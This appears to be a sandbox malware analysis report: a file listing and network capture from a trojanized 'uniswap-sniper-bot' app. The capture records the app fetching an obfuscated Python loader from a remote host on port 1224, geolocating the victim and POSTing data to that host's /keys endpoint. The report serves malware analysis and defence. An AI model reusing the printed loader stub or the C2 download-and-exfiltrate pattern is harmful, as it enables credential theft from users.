C:\Users\user\.pyp\Lib\pycache\dataclasses.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\dataclasses.cpython-311.pyc.2784497353776

C:\Users\user\.pyp\Lib\pycache\datetime.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\datetime.cpython-311.pyc.2126016192432

C:\Users\user\.pyp\Lib\pycache\dis.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\dis.cpython-311.pyc.2784498075216

C:\Users\user\.pyp\Lib\pycache\enum.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\enum.cpython-311.pyc.2128149344224

C:\Users\user\.pyp\Lib\pycache\fnmatch.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\fnmatch.cpython-311.pyc.2126053634912

C:\Users\user\.pyp\Lib\pycache\ftplib.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\ftplib.cpython-311.pyc.2253738244704

C:\Users\user\.pyp\Lib\pycache\functools.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\functools.cpython-311.pyc.2128149347808

C:\Users\user\.pyp\Lib\pycache\getpass.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\getpass.cpython-311.pyc.2253738236752

C:\Users\user\.pyp\Lib\pycache\gettext.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\gettext.cpython-311.pyc.2784491897776

C:\Users\user\.pyp\Lib\pycache\glob.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\glob.cpython-311.pyc.2784492257440

C:\Users\user\.pyp\Lib\pycache\hashlib.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\hashlib.cpython-311.pyc.2126026035184

C:\Users\user\.pyp\Lib\pycache\heapq.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\heapq.cpython-311.pyc.2126026042128

C:\Users\user\.pyp\Lib\pycache\hmac.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\hmac.cpython-311.pyc.2126026034400

C:\Users\user\.pyp\Lib\pycache\imp.cpython-311.pyc (copy)

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 09:38:57.673319101 CET	162	OUT	GET /mclip/7/701 HTTP/1.1 Host: 185.153.182.241:1224 User-Agent: python-requests/2.31.0 Accept-Encoding: gzip, deflate Accept: / Connection: keep-alive
Dec 13, 2024 09:38:59.040332079 CET	1236	IN	HTTP/1.1 200 OK X-Powered-By: Express Access-Control-Allow-Origin: * Content-Disposition: attachment; filename="mclip7_701.py" Accept-Ranges: bytes Cache-Control: public, max-age=0 Last-Modified: Thu, 07 Nov 2024 18:51:56 GMT ETag: W/"20b7-19307f80a6b" Content-Type: application/octet-stream Content-Length: 8375 Date: Fri, 13 Dec 2024 08:38:58 GMT Connection: keep-alive Keep-Alive: timeout=5 Data Raw: 5f 20 3d 20 6c 61 6d 62 64 61 20 5f 5f 20 3a 20 5f 5f 69 6d 70 6f 72 74 5f 5f 28 27 7a 6c 69 62 27 29 2e 64 65 63 6f 6d 70 72 65 73 73 28 5f 5f 69 6d 70 6f 72 74 5f 5f 28 27 62 61 73 65 36 34 27 29 2e 62 36 34 64 65 63 6f 64 65 28 5f 5f 5b 3a 3a 2d 31 5d 29 29 3b 65 78 65 63 28 28 5f 29 28 62 27 39 76 36 59 71 2b 2f 2b 2b 2f 2f 50 79 58 4a 75 42 6e 73 7a 56 39 7a 36 78 2f 4d 41 63 4b 2f 51 69 56 32 4d 71 37 47 54 50 4c 34 70 72 6e 37 49 6a 2f 76 45 50 41 70 73 32 79 67 45 4c 4c 50 6d 44 49 69 71 75 79 4b 45 41 30 66 4e 6c 6f 49 33 75 50 65 5a 68 66 68 59 30 55 70 6d 50 2f 47 6a 4c 65 53 45 35 35 4a 45 30 77 7a 4b 67 44 64 76 51 33 4f 7a 2b 66 45 30 48 35 63 73 62 67 73 6a 2b 65 4e 6b 66 6d 38 55 54 58 72 53 58 46 74 66 6a 76 2f 4f 6f 74 4e 33 68 34 39 75 75 78 38 6e 30 33 44 5a 54 45 4e 6b 53 7a 56 66 57 6c 4c 44 74 2f 39 73 35 4b 36 5a 65 45 59 32 4f 6a 68 49 35 39 58 6e 4b 2f 70 31 2f 4a 41 39 45 35 5a 35 66 35 42 35 6e 34 6f 45 67 5a 52 30 41 4d 44 46 6b 37 35 55 6e 77 38 70 51 68 32 39 4e 38 37 [TRUNCATED] Data Ascii: _ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'9v6Yq+/++//PyXJuBnszV9z6x/MAcK/QiV2Mq7GTPL4prn7Ij/vEPAps2ygELLPmDIiquyKEA0fNloI3uPeZhfhY0UpmP/GjLeSE55JE0wzKgDdvQ3Oz+fE0H5csbgsj+eNkfm8UTXrSXFtfjv/OotN3h49uux8n03DZTENkSzVfWlLDt/9s5K6ZeEY2OjhI59XnK/p1/JA9E5Z5f5B5n4oEgZR0AMDFk75Unw8pQh29N87CZ5ruuCxjXfEEH2MSgfNbQ6f2ozJxFVP7SLq41v3HsgY9C/H3rnc23sAV1sFUrDrRzrX/X03qrnL0fjYsDOKInCrw/bqQ8R5xbC5Vtxc5D4GYx5yZWNAv9GbtkfCuYJxmJI3NKutx70RwednhC30A8VOFiYuwF2zmHdeT6O79ZYy0Hu7OsuQfr4sRzIWxxZGdc85xe065/1G+6H7MWCsYjExpYs8rqbzJtq53vK9wExUI14KVvMvLg+tKGqqdQgWOoLKt+jSTNLNofXVpyaLJ8fZGZjcv+mLdsPV//AhPb0oOdjOljXOii5AZv5uWv9VocSUZePiZuEdaT+7XADOmK9bqVI8f8mLqmuSTURXkJV1AdK5DBS2igfqArzCqjEuk2BfxKmQuSsoFWGCupaeJXclWd2KXBG22lOldAlSDjCsla6HWsslhT3Pdq8ePf2z2pASVFGRs8PO3tpSxGIerNYT4euP8CrTlar22TSk0

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 09:38:59.514101982 CET	145	OUT	GET /json HTTP/1.1 Host: ip-api.com User-Agent: python-requests/2.31.0 Accept-Encoding: gzip, deflate Accept: / Connection: keep-alive
Dec 13, 2024 09:39:00.553637028 CET	483	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:59 GMT Content-Type: application/json; charset=utf-8 Content-Length: 306 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 09:39:00.731795073 CET	226	OUT	POST /keys HTTP/1.1 Host: 185.153.182.241:1224 User-Agent: python-requests/2.31.0 Accept-Encoding: gzip, deflate Accept: / Connection: keep-alive Content-Length: 690 Content-Type: application/x-www-form-urlencoded
Dec 13, 2024 09:39:02.178772926 CET	281	IN	HTTP/1.1 200 OK X-Powered-By: Express Access-Control-Allow-Origin: * Content-Type: application/json; charset=utf-8 Content-Length: 15 ETag: W/"f-NQVRlQfKHCoInEbhALgECMonhCE" Date: Fri, 13 Dec 2024 08:39:01 GMT Connection: keep-alive Keep-Alive: timeout=5 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 74 72 75 65 7d Data Ascii: {"status":true}

Timestamp	Bytes transferred	Direction	Data
2024-12-13 08:36:33 UTC	572	OUT	GET /ajax/libs/materialize/1.0.0/css/materialize.min.css HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="102" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) uniswap-sniper-bot-with-gui/1.0.0 Chrome/102.0.5005.167 Electron/19.1.9 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Accept-Encoding: gzip, deflate, br Accept-Language: en-GB
2024-12-13 08:36:33 UTC	957	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:36:33 GMT Content-Type: text/css; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"5eb03efe-22a11" Last-Modified: Mon, 04 May 2020 16:12:46 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 120080 Expires: Wed, 03 Dec 2025 08:36:33 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MET9hY%2B2KEIIJDdOa8%2BvICL2%2B8Pl%2BvfGOURUPPmG8J72SX%2BdNL9PkWgXzJywBSTUdQwln0ymADGg4b5Vk1nltbhEo5RJjqawXlDy87%2F0%2BbCmf1o%2BxyOq8ghXaD%2B8sBx6NII8jAMm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 8f14a08d0adf0ca8-EWR alt-svc: h3=":443"; ma=86400
2024-12-13 08:36:33 UTC	412	IN	Data Raw: 37 62 66 33 0d 0a 2f 2a 21 0d 0a 20 2a 20 4d 61 74 65 72 69 61 6c 69 7a 65 20 76 31 2e 30 2e 30 20 28 68 74 74 70 3a 2f 2f 6d 61 74 65 72 69 61 6c 69 7a 65 63 73 73 2e 63 6f 6d 29 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 34 2d 32 30 31 37 20 4d 61 74 65 72 69 61 6c 69 7a 65 0d 0a 20 2a 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 44 6f 67 66 61 6c 6f 2f 6d 61 74 65 72 69 61 6c 69 7a 65 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0d 0a 20 2a 2f 0d 0a 2e 6d 61 74 65 72 69 61 6c 69 7a 65 2d 72 65 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 35 31 63 32 33 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 61 74 65 72 69 61 6c 69 7a 65 Data Ascii: 7bf3/! Materialize v1.0.0 (http://materializecss.com) * Copyright 2014-2017 Materialize * MIT License (https://raw.githubusercontent.com/Dogfalo/materialize/master/LICENSE) */.materialize-red{background-color:#e51c23 !important}.materialize
2024-12-13 08:36:33 UTC	1369	IN	Data Raw: 6e 74 7d 2e 6d 61 74 65 72 69 61 6c 69 7a 65 2d 72 65 64 2e 6c 69 67 68 74 65 6e 2d 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 38 63 31 63 33 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 61 74 65 72 69 61 6c 69 7a 65 2d 72 65 64 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 34 7b 63 6f 6c 6f 72 3a 23 66 38 63 31 63 33 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 61 74 65 72 69 61 6c 69 7a 65 2d 72 65 64 2e 6c 69 67 68 74 65 6e 2d 33 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 33 39 38 39 62 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 61 74 65 72 69 61 6c 69 7a 65 2d 72 65 64 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 33 7b 63 6f 6c 6f 72 3a 23 66 33 39 38 39 62 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d Data Ascii: nt}.materialize-red.lighten-4{background-color:#f8c1c3 !important}.materialize-red-text.text-lighten-4{color:#f8c1c3 !important}.materialize-red.lighten-3{background-color:#f3989b !important}.materialize-red-text.text-lighten-3{color:#f3989b !important}.m
2024-12-13 08:36:33 UTC	1369	IN	Data Raw: 74 61 6e 74 7d 2e 72 65 64 2e 6c 69 67 68 74 65 6e 2d 32 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 45 35 37 33 37 33 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 72 65 64 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 32 7b 63 6f 6c 6f 72 3a 23 45 35 37 33 37 33 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 72 65 64 2e 6c 69 67 68 74 65 6e 2d 31 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 45 46 35 33 35 30 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 72 65 64 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 31 7b 63 6f 6c 6f 72 3a 23 45 46 35 33 35 30 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 72 65 64 2e 64 61 72 6b 65 6e 2d 31 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 45 35 33 39 33 35 20 21 69 6d 70 6f 72 74 61 6e Data Ascii: tant}.red.lighten-2{background-color:#E57373 !important}.red-text.text-lighten-2{color:#E57373 !important}.red.lighten-1{background-color:#EF5350 !important}.red-text.text-lighten-1{color:#EF5350 !important}.red.darken-1{background-color:#E53935 !importan
2024-12-13 08:36:33 UTC	1369	IN	Data Raw: 34 38 66 62 31 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 69 6e 6b 2e 6c 69 67 68 74 65 6e 2d 32 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 30 36 32 39 32 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 69 6e 6b 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 32 7b 63 6f 6c 6f 72 3a 23 66 30 36 32 39 32 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 69 6e 6b 2e 6c 69 67 68 74 65 6e 2d 31 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 63 34 30 37 61 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 69 6e 6b 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 31 7b 63 6f 6c 6f 72 3a 23 65 63 34 30 37 61 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 69 6e 6b 2e 64 61 72 6b 65 6e 2d 31 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a Data Ascii: 48fb1 !important}.pink.lighten-2{background-color:#f06292 !important}.pink-text.text-lighten-2{color:#f06292 !important}.pink.lighten-1{background-color:#ec407a !important}.pink-text.text-lighten-1{color:#ec407a !important}.pink.darken-1{background-color:
2024-12-13 08:36:33 UTC	1369	IN	Data Raw: 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 75 72 70 6c 65 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 33 7b 63 6f 6c 6f 72 3a 23 63 65 39 33 64 38 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 75 72 70 6c 65 2e 6c 69 67 68 74 65 6e 2d 32 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 62 61 36 38 63 38 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 75 72 70 6c 65 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 32 7b 63 6f 6c 6f 72 3a 23 62 61 36 38 63 38 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 75 72 70 6c 65 2e 6c 69 67 68 74 65 6e 2d 31 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 61 62 34 37 62 63 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 75 72 70 6c 65 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 31 7b 63 Data Ascii: !important}.purple-text.text-lighten-3{color:#ce93d8 !important}.purple.lighten-2{background-color:#ba68c8 !important}.purple-text.text-lighten-2{color:#ba68c8 !important}.purple.lighten-1{background-color:#ab47bc !important}.purple-text.text-lighten-1{c
2024-12-13 08:36:33 UTC	1369	IN	Data Raw: 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 65 65 70 2d 70 75 72 70 6c 65 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 34 7b 63 6f 6c 6f 72 3a 23 64 31 63 34 65 39 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 65 65 70 2d 70 75 72 70 6c 65 2e 6c 69 67 68 74 65 6e 2d 33 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 62 33 39 64 64 62 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 65 65 70 2d 70 75 72 70 6c 65 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 33 7b 63 6f 6c 6f 72 3a 23 62 33 39 64 64 62 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 65 65 70 2d 70 75 72 70 6c 65 2e 6c 69 67 68 74 65 6e 2d 32 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 39 35 37 35 63 64 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 65 65 70 2d 70 75 72 Data Ascii: !important}.deep-purple-text.text-lighten-4{color:#d1c4e9 !important}.deep-purple.lighten-3{background-color:#b39ddb !important}.deep-purple-text.text-lighten-3{color:#b39ddb !important}.deep-purple.lighten-2{background-color:#9575cd !important}.deep-pur
2024-12-13 08:36:33 UTC	1369	IN	Data Raw: 35 31 62 35 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 6e 64 69 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 33 66 35 31 62 35 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 6e 64 69 67 6f 2e 6c 69 67 68 74 65 6e 2d 35 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 38 65 61 66 36 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 6e 64 69 67 6f 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 35 7b 63 6f 6c 6f 72 3a 23 65 38 65 61 66 36 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 6e 64 69 67 6f 2e 6c 69 67 68 74 65 6e 2d 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 63 35 63 61 65 39 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 6e 64 69 67 6f 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 34 7b 63 6f 6c 6f 72 3a 23 63 35 63 61 65 Data Ascii: 51b5 !important}.indigo-text{color:#3f51b5 !important}.indigo.lighten-5{background-color:#e8eaf6 !important}.indigo-text.text-lighten-5{color:#e8eaf6 !important}.indigo.lighten-4{background-color:#c5cae9 !important}.indigo-text.text-lighten-4{color:#c5cae
2024-12-13 08:36:33 UTC	1369	IN	Data Raw: 70 6f 72 74 61 6e 74 7d 2e 69 6e 64 69 67 6f 2d 74 65 78 74 2e 74 65 78 74 2d 61 63 63 65 6e 74 2d 34 7b 63 6f 6c 6f 72 3a 23 33 30 34 66 66 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 6c 75 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 39 36 46 33 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 6c 75 65 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 32 31 39 36 46 33 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 6c 75 65 2e 6c 69 67 68 74 65 6e 2d 35 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 45 33 46 32 46 44 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 6c 75 65 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 35 7b 63 6f 6c 6f 72 3a 23 45 33 46 32 46 44 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 6c 75 65 2e 6c 69 67 68 74 65 6e 2d Data Ascii: portant}.indigo-text.text-accent-4{color:#304ffe !important}.blue{background-color:#2196F3 !important}.blue-text{color:#2196F3 !important}.blue.lighten-5{background-color:#E3F2FD !important}.blue-text.text-lighten-5{color:#E3F2FD !important}.blue.lighten-
2024-12-13 08:36:33 UTC	1369	IN	Data Raw: 65 6e 74 2d 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 39 36 32 46 46 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 6c 75 65 2d 74 65 78 74 2e 74 65 78 74 2d 61 63 63 65 6e 74 2d 34 7b 63 6f 6c 6f 72 3a 23 32 39 36 32 46 46 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 69 67 68 74 2d 62 6c 75 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 33 61 39 66 34 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 69 67 68 74 2d 62 6c 75 65 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 33 61 39 66 34 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 69 67 68 74 2d 62 6c 75 65 2e 6c 69 67 68 74 65 6e 2d 35 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 31 66 35 66 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 69 67 68 74 2d 62 6c 75 65 2d 74 65 78 Data Ascii: ent-4{background-color:#2962FF !important}.blue-text.text-accent-4{color:#2962FF !important}.light-blue{background-color:#03a9f4 !important}.light-blue-text{color:#03a9f4 !important}.light-blue.lighten-5{background-color:#e1f5fe !important}.light-blue-tex
2024-12-13 08:36:33 UTC	1369	IN	Data Raw: 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 69 67 68 74 2d 62 6c 75 65 2d 74 65 78 74 2e 74 65 78 74 2d 61 63 63 65 6e 74 2d 32 7b 63 6f 6c 6f 72 3a 23 34 30 63 34 66 66 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 69 67 68 74 2d 62 6c 75 65 2e 61 63 63 65 6e 74 2d 33 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 62 30 66 66 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 69 67 68 74 2d 62 6c 75 65 2d 74 65 78 74 2e 74 65 78 74 2d 61 63 63 65 6e 74 2d 33 7b 63 6f 6c 6f 72 3a 23 30 30 62 30 66 66 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 69 67 68 74 2d 62 6c 75 65 2e 61 63 63 65 6e 74 2d 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 39 31 65 61 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 69 67 68 74 2d 62 6c 75 65 2d 74 65 78 74 2e 74 65 Data Ascii: important}.light-blue-text.text-accent-2{color:#40c4ff !important}.light-blue.accent-3{background-color:#00b0ff !important}.light-blue-text.text-accent-3{color:#00b0ff !important}.light-blue.accent-4{background-color:#0091ea !important}.light-blue-text.te

Timestamp	Bytes transferred	Direction	Data
2024-12-13 08:36:37 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-13 08:36:37 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-13 08:36:37 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 13 Dec 2024 08:36:37 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f14a0a5de1ff5f7-EWR alt-svc: h3=":443"; ma=86400
2024-12-13 08:36:37 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 2c 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom, c)

Timestamp	Bytes transferred	Direction	Data
2024-12-13 08:39:02 UTC	200	OUT	GET /ftp/python/3.11.0/python-3.11.0-amd64.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.python.org Connection: Keep-Alive
2024-12-13 08:39:02 UTC	586	IN	HTTP/1.1 200 OK Connection: close Content-Length: 25157416 x-clacks-overhead: GNU Terry Pratchett server: nginx content-type: application/octet-stream etag: "6356df2e-17fdf28" via: 1.1 varnish, 1.1 varnish, 1.1 varnish last-modified: Mon, 24 Oct 2022 18:53:34 GMT Accept-Ranges: bytes Age: 127253 Date: Fri, 13 Dec 2024 08:39:02 GMT X-Served-By: cache-lga21928-LGA, cache-lga21969-LGA, cache-ewr-kewr1740047-EWR X-Cache: MISS, HIT, HIT X-Cache-Hits: 0, 49, 0 X-Timer: S1734079143.558589,VS0,VE1 Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
